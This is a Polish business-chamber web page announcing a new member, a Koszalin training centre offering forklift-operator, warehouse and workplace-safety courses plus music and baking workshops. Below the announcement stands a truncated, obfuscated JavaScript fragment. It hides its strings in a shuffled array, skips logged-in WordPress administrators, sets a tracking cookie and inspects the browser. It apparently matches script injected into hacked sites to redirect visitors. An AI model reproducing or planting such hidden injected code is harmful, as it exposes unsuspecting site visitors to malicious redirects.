Nowa firma – Centrum Szkoleniowo – Usługowe HERO Henryk Rogoziński | Północna Izba Gospodarcza w Koszalinie

Miło nam poinformować, że o naszej Izby dołączyła nowa firma – Centrum Szkoleniowo – Usługowe HERO Henryk Rogoziński.

Od 2010 r. specjalizuję się w szkoleniach z zakresu:
 
+ obsługa wózków jezdniowych podnośnikowych z mechanicznym napędem podnoszenia z wyłączeniem wózków z wysięgnikiem oraz wózków z osobą obsługującą podnoszoną wraz z ładunkiem;
+ nowoczesny magazynier – logistyka magazynu;
+ BHP przy obsłudze wózków jezdniowych.
 
Podczas szkoleń wykorzystuję metodę aktywnych ćwiczeń, różne formy dyskusji, analizy case study. Szkolenie kompleksowo przygotowuje do pracy na stanowisku operatora wózków jezdniowych, zgodnie z programem zarejestrowanym w ODK w Mysłowicach 23/03/2018/W-P i zatwierdzonym przez Urząd Dozoru Technicznego w Warszawie. Czas trwania i program szkolenia opracowuję zgodnie z potrzebami pracodawców i kursantów.
Moje szkolenia przynoszą wymierny efekt – mogę pochwalić się wysoką zdawalnością egzaminów przed Komisjami UDT.
Szkolenia prowadzone są w różnych częściach kraju.
 
KONCERTY, OPRAWA MUZYCZNA, EVNENTY & WARSZTATY
Muzyka i malarstwo było zawsze! Warsztaty, oprawa muzyczna i eventy doszły z czasem. Po prostu trzeba posłuchać i zobaczyć!
 
  •  warsztaty wypieku chleba;
  • kuchnia wegetariańska;
  • warsztaty muzyczne.
 

Centrum Szkoleniowo-Usługowe „HERO” Henryk Rogoziński

Koszalin

tel.: 795-587-080

608-472-735

https://www.facebook.com/C.S.U.HERO/

enri2@wp.pl

 
Serdecznie witamy i zapraszamy do współpracy!
 
 

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m